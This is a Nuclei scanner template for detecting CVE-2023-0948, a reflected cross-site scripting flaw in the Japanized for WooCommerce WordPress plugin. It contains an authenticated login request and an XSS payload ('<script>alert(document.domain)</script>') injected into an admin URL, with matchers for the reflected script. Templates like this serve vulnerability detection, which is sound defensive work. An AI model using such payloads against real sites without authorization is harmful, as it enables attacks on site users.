nuclei-templates/http/cves/2023/CVE-2023-0948.yaml

51 lines
2.1 KiB
YAML

id: CVE-2023-0948
info:
name: WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: Fixed in version 2.5.8.
reference:
- https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718
- https://wordpress.org/plugins/woocommerce-for-japan/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0948
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0948
cwe-id: CWE-79
epss-score: 0.00071
epss-percentile: 0.29514
cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: "true"
max-request: 2
vendor: artisanworkshop
product: japanized_for_woocommerce
framework: wordpress
tags: wpscan,cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=peachpay&tab=field&"><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "peachpay")'
condition: and
# digest: 4b0a00483046022100934059badd9a62e67ef74bd360db51692121de7093794fc911466496710dcfef02210091e96692148c923d5698985a435a12dcf06ec3365df4b06e4c500ed5fc2f5776:922c64590222798bb761d5b6d8e72950